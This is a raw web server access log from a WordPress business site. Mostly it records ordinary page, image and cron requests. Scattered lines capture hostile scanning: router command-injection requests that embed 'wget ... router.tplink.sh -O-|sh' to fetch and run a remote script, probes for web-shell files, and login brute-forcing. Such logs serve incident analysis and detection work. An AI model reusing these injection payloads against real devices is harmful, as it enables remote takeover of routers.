23.239.106.226 - - [28/Aug/2025:11:29:55 +0800] "GET /index.php?author=2 HTTP/1.1" 301 5 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0"
23.239.106.226 - - [28/Aug/2025:11:29:56 +0800] "GET /?author=2 HTTP/1.1" 404 8990 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0"
23.239.106.226 - - [28/Aug/2025:11:29:56 +0800] "GET /index.php?author=3 HTTP/1.1" 301 5 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
23.239.106.226 - - [28/Aug/2025:11:29:57 +0800] "GET /?author=3 HTTP/1.1" 404 8990 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
36.133.115.36 - - [28/Aug/2025:11:32:22 +0800] "POST /wp-cron.php?doing_wp_cron=1756351942.8964250087738037109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
107.175.141.10 - - [28/Aug/2025:11:32:23 +0800] "GET / HTTP/1.1" 200 151669 "-" "-"
36.133.115.36 - - [28/Aug/2025:11:40:50 +0800] "POST /wp-cron.php?doing_wp_cron=1756352450.6502358913421630859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
82.156.68.74 - - [28/Aug/2025:11:40:50 +0800] "GET / HTTP/1.1" 200 33395 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
123.57.13.121 - - [28/Aug/2025:11:48:33 +0800] "GET / HTTP/1.1" 200 33857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
112.185.152.220 - - [28/Aug/2025:11:50:04 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//95.103.172.144/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
112.185.152.220 - - [28/Aug/2025:11:50:04 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//95.103.172.144/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
36.133.115.36 - - [28/Aug/2025:11:50:04 +0800] "POST /wp-cron.php?doing_wp_cron=1756353004.9519319534301757812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [28/Aug/2025:11:54:17 +0800] "POST /wp-cron.php?doing_wp_cron=1756353257.0143640041351318359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.173.1.69 - - [28/Aug/2025:11:54:17 +0800] "GET / HTTP/1.1" 200 33395 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [28/Aug/2025:11:57:42 +0800] "POST /wp-cron.php?doing_wp_cron=1756353462.3989009857177734375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
85.95.216.149 - - [28/Aug/2025:11:57:42 +0800] "GET /wp-login.php HTTP/1.1" 200 2781 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
85.95.216.149 - - [28/Aug/2025:11:57:44 +0800] "POST /wp-login.php HTTP/1.1" 200 2971 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [28/Aug/2025:11:58:34 +0800] "POST /wp-cron.php?doing_wp_cron=1756353514.4635450839996337890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
65.49.1.222 - - [28/Aug/2025:11:58:34 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
36.133.115.36 - - [28/Aug/2025:11:59:39 +0800] "POST /wp-cron.php?doing_wp_cron=1756353579.0699560642242431640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
65.49.1.222 - - [28/Aug/2025:11:59:39 +0800] "GET /webui/ HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0"
36.133.115.36 - - [28/Aug/2025:12:00:24 +0800] "POST /wp-cron.php?doing_wp_cron=1756353624.0233049392700195312500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
65.49.1.223 - - [28/Aug/2025:12:00:24 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0"
65.49.1.226 - - [28/Aug/2025:12:00:24 +0800] "GET / HTTP/1.1" 200 33857 "http://36.133.115.36/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0"
36.133.115.36 - - [28/Aug/2025:12:02:10 +0800] "POST /wp-cron.php?doing_wp_cron=1756353730.9012160301208496093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
65.49.1.222 - - [28/Aug/2025:12:02:10 +0800] "GET /geoserver/web/ HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
36.133.115.36 - - [28/Aug/2025:12:03:22 +0800] "POST /wp-cron.php?doing_wp_cron=1756353802.5907320976257324218750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [28/Aug/2025:12:03:22 +0800] "GET / HTTP/1.1" 200 33395 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
122.199.74.31 - - [28/Aug/2025:12:30:49 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
122.199.74.31 - - [28/Aug/2025:12:30:49 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
36.133.115.36 - - [28/Aug/2025:12:30:50 +0800] "POST /wp-cron.php?doing_wp_cron=1756355450.5105760097503662109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.108.234.62 - - [28/Aug/2025:12:32:48 +0800] "GET / HTTP/1.1" 200 33857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:12:32:48 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:12:32:49 +0800] "GET /wp-content/uploads/revslider/slider-1/1750929639-yuanjing_Slider_3840%C3%972160_20250626171955-scaled.webp HTTP/1.1" 200 203290 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:12:32:50 +0800] "GET /wp-content/uploads/2025/07/1753456723-%E5%8F%8C%E7%9B%B8%E9%92%A2roduct_Single600.webp HTTP/1.1" 200 22790 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:12:32:50 +0800] "GET /wp-content/uploads/2025/07/1753453096-%E5%8F%8C%E7%9B%B8%E9%92%A2product_Single600%C3%97284.webp HTTP/1.1" 200 14562 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:12:32:50 +0800] "GET /wp-content/uploads/2025/07/1753456770-%E7%83%AD%E9%95%80%E9%94%8C%E5%8D%B7product_Single600.webp HTTP/1.1" 200 27502 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:12:32:50 +0800] "GET /wp-content/uploads/2025/07/1753453127-%E4%BD%99%E5%8D%B7product_Single600%C3%97284.webp HTTP/1.1" 200 18744 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:12:32:50 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled-50x100.webp HTTP/1.1" 200 1660 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:12:32:50 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
36.133.115.36 - - [28/Aug/2025:12:32:50 +0800] "POST /wp-cron.php?doing_wp_cron=1756355570.8471679687500000000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.108.234.62 - - [28/Aug/2025:12:32:50 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=3 HTTP/1.1" 200 2292 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:12:32:50 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=2 HTTP/1.1" 200 2058 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:12:32:50 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled.webp HTTP/1.1" 200 141034 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:12:32:50 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled.webp HTTP/1.1" 200 197360 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:12:32:54 +0800] "GET /services/ HTTP/1.1" 200 25476 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:12:32:54 +0800] "GET /wp-content/uploads/2025/07/1751829454-Smart-warehousing800x500.webp HTTP/1.1" 200 79504 "http://cqqizhou.com/services/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:12:32:54 +0800] "GET /wp-content/uploads/2025/07/1751829518-Precision-processing-services800x500.webp HTTP/1.1" 200 28964 "http://cqqizhou.com/services/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:12:32:54 +0800] "GET /wp-content/uploads/2025/07/1751857929-3D-one-stop-supply-chain-service-W900px2.webp HTTP/1.1" 200 38362 "http://cqqizhou.com/services/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:12:32:54 +0800] "GET /wp-content/uploads/2025/07/1753405252-Services_Banner2000%C3%97400px2.webp HTTP/1.1" 200 23730 "http://cqqizhou.com/services/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
36.133.115.36 - - [28/Aug/2025:12:34:15 +0800] "POST /wp-cron.php?doing_wp_cron=1756355655.9477479457855224609375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.108.234.62 - - [28/Aug/2025:12:34:15 +0800] "GET /process/processing HTTP/1.1" 301 5 "http://cqqizhou.com/services/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:12:34:16 +0800] "GET /services/processing/ HTTP/1.1" 200 22830 "http://cqqizhou.com/services/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:12:34:16 +0800] "GET /wp-content/uploads/2025/07/1751826322-Services_images_W900px.webp HTTP/1.1" 200 87128 "http://cqqizhou.com/services/processing/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:12:34:17 +0800] "GET /wp-content/uploads/2025/07/1753410289-News2000%C3%97400_202571.webp HTTP/1.1" 200 17830 "http://cqqizhou.com/services/processing/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
172.190.142.176 - - [28/Aug/2025:12:41:23 +0800] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 27 "-" "-"
172.190.142.176 - - [28/Aug/2025:12:41:23 +0800] "GET /class9.php HTTP/1.1" 404 27 "-" "-"
172.190.142.176 - - [28/Aug/2025:12:41:23 +0800] "GET /x.php HTTP/1.1" 404 27 "-" "-"
172.190.142.176 - - [28/Aug/2025:12:41:24 +0800] "GET /asasx.php HTTP/1.1" 404 27 "-" "-"
172.190.142.176 - - [28/Aug/2025:12:41:24 +0800] "GET /abcd.php HTTP/1.1" 404 27 "-" "-"
172.190.142.176 - - [28/Aug/2025:12:41:24 +0800] "GET /g.php HTTP/1.1" 404 27 "-" "-"
172.190.142.176 - - [28/Aug/2025:12:41:24 +0800] "GET /aaa.php HTTP/1.1" 404 27 "-" "-"
172.190.142.176 - - [28/Aug/2025:12:41:25 +0800] "GET /bypass.php HTTP/1.1" 404 27 "-" "-"
172.190.142.176 - - [28/Aug/2025:12:41:25 +0800] "GET /asd67.php HTTP/1.1" 404 27 "-" "-"
172.190.142.176 - - [28/Aug/2025:12:41:25 +0800] "GET /y.php HTTP/1.1" 404 27 "-" "-"
172.190.142.176 - - [28/Aug/2025:12:41:25 +0800] "GET /file18.php HTTP/1.1" 404 27 "-" "-"
172.190.142.176 - - [28/Aug/2025:12:41:26 +0800] "GET /file17.php HTTP/1.1" 404 27 "-" "-"
172.190.142.176 - - [28/Aug/2025:12:41:26 +0800] "GET /class20.php HTTP/1.1" 404 27 "-" "-"
172.190.142.176 - - [28/Aug/2025:12:41:26 +0800] "GET /nfile.php HTTP/1.1" 404 27 "-" "-"
172.190.142.176 - - [28/Aug/2025:12:41:27 +0800] "GET /akp.php HTTP/1.1" 404 27 "-" "-"
172.190.142.176 - - [28/Aug/2025:12:41:27 +0800] "GET /ot.php HTTP/1.1" 404 27 "-" "-"
172.190.142.176 - - [28/Aug/2025:12:41:27 +0800] "GET /1.php HTTP/1.1" 404 27 "-" "-"
172.190.142.176 - - [28/Aug/2025:12:41:27 +0800] "GET /xp.php HTTP/1.1" 404 27 "-" "-"
172.190.142.176 - - [28/Aug/2025:12:41:28 +0800] "GET /a.php HTTP/1.1" 404 27 "-" "-"
172.190.142.176 - - [28/Aug/2025:12:41:28 +0800] "GET /just2.php HTTP/1.1" 404 27 "-" "-"
172.190.142.176 - - [28/Aug/2025:12:41:28 +0800] "GET /auth.php HTTP/1.1" 404 27 "-" "-"
172.190.142.176 - - [28/Aug/2025:12:41:28 +0800] "GET /k.php HTTP/1.1" 404 27 "-" "-"
172.190.142.176 - - [28/Aug/2025:12:41:29 +0800] "GET /nc4.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [28/Aug/2025:12:41:36 +0800] "POST /wp-cron.php?doing_wp_cron=1756356096.4865660667419433593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
23.239.106.226 - - [28/Aug/2025:12:41:36 +0800] "GET /wp-login.php HTTP/1.1" 200 2781 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
23.239.106.226 - - [28/Aug/2025:12:41:38 +0800] "POST /wp-login.php HTTP/1.1" 200 2978 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
183.106.42.146 - - [28/Aug/2025:12:43:50 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
183.106.42.146 - - [28/Aug/2025:12:43:50 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
36.133.115.36 - - [28/Aug/2025:12:43:51 +0800] "POST /wp-cron.php?doing_wp_cron=1756356230.9791409969329833984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [28/Aug/2025:12:59:25 +0800] "POST /wp-cron.php?doing_wp_cron=1756357165.5766019821166992187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [28/Aug/2025:12:59:45 +0800] "GET / HTTP/1.1" 200 96805 "-" "-"
36.133.115.36 - - [28/Aug/2025:13:10:40 +0800] "POST /wp-cron.php?doing_wp_cron=1756357840.3500080108642578125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [28/Aug/2025:13:10:40 +0800] "GET / HTTP/1.1" 200 33395 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
59.1.211.226 - - [28/Aug/2025:13:14:55 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
59.1.211.226 - - [28/Aug/2025:13:14:55 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
36.133.115.36 - - [28/Aug/2025:13:14:55 +0800] "POST /wp-cron.php?doing_wp_cron=1756358095.8420579433441162109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [28/Aug/2025:13:20:23 +0800] "POST /wp-cron.php?doing_wp_cron=1756358423.0816740989685058593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
220.249.76.118 - - [28/Aug/2025:13:20:23 +0800] "GET /2214 HTTP/1.1" 301 5 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
36.133.115.36 - - [28/Aug/2025:13:21:52 +0800] "POST /wp-cron.php?doing_wp_cron=1756358512.3507120609283447265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
50.6.155.26 - - [28/Aug/2025:13:21:52 +0800] "GET /wp-login.php HTTP/1.1" 200 2781 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
50.6.155.26 - - [28/Aug/2025:13:21:54 +0800] "POST /wp-login.php HTTP/1.1" 200 2974 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
221.159.119.6 - - [28/Aug/2025:13:24:17 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
221.159.119.6 - - [28/Aug/2025:13:24:17 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
36.133.115.36 - - [28/Aug/2025:13:24:18 +0800] "POST /wp-cron.php?doing_wp_cron=1756358658.1704890727996826171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [28/Aug/2025:13:35:05 +0800] "POST /wp-cron.php?doing_wp_cron=1756359305.5207879543304443359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.148.122 - - [28/Aug/2025:13:35:06 +0800] "GET / HTTP/1.0" 200 151647 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
4.38.142.6 - - [28/Aug/2025:13:46:03 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
36.133.115.36 - - [28/Aug/2025:13:46:03 +0800] "POST /wp-cron.php?doing_wp_cron=1756359963.7191650867462158203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
4.38.142.6 - - [28/Aug/2025:13:46:11 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
36.133.115.36 - - [28/Aug/2025:13:54:50 +0800] "POST /wp-cron.php?doing_wp_cron=1756360490.7360200881958007812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
196.251.69.194 - - [28/Aug/2025:13:54:51 +0800] "GET / HTTP/1.0" 200 151647 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
14.108.234.62 - - [28/Aug/2025:14:01:15 +0800] "GET /wp-content/uploads/2025/07/1753454299-Article_images_W900px.webp HTTP/1.1" 200 52418 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:14:01:15 +0800] "GET /wp-content/uploads/2025/07/1753454089-Article_images_W900px.webp HTTP/1.1" 200 27552 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
36.133.115.36 - - [28/Aug/2025:14:01:16 +0800] "POST /wp-cron.php?doing_wp_cron=1756360876.2977879047393798828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [28/Aug/2025:14:01:16 +0800] "POST /wp-cron.php?doing_wp_cron=1756360876.2989659309387207031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.108.234.62 - - [28/Aug/2025:14:01:16 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=2 HTTP/1.1" 200 2058 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:14:01:16 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=3 HTTP/1.1" 200 2292 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:14:01:16 +0800] "GET /wp-content/uploads/2025/07/1750174127-Marketing1920x800_3.webp HTTP/1.1" 200 52790 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1755834647" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:14:01:23 +0800] "GET /wp-content/uploads/2025/07/1751967322-Storage-processing_images_W900%C3%97300.webp HTTP/1.1" 200 23120 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1755834647" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:14:01:24 +0800] "GET /wp-content/uploads/2025/07/1751988544-Logistics-delivery_images_W900%C3%97300.webp HTTP/1.1" 200 26142 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1755834647" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:14:01:40 +0800] "GET //Material.html HTTP/1.1" 301 5 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:14:01:41 +0800] "GET /Material.html HTTP/1.1" 404 8989 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
36.133.115.36 - - [28/Aug/2025:14:01:59 +0800] "POST /wp-cron.php?doing_wp_cron=1756360919.3052029609680175781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
141.95.53.61 - - [28/Aug/2025:14:01:59 +0800] "GET /wp-login.php HTTP/1.1" 200 2781 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
141.95.53.61 - - [28/Aug/2025:14:02:01 +0800] "POST /wp-login.php HTTP/1.1" 200 2973 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
14.108.234.62 - - [28/Aug/2025:14:02:02 +0800] "GET //Material.html HTTP/1.1" 301 5 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.234.62 - - [28/Aug/2025:14:02:02 +0800] "GET /Material.html HTTP/1.1" 404 8989 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
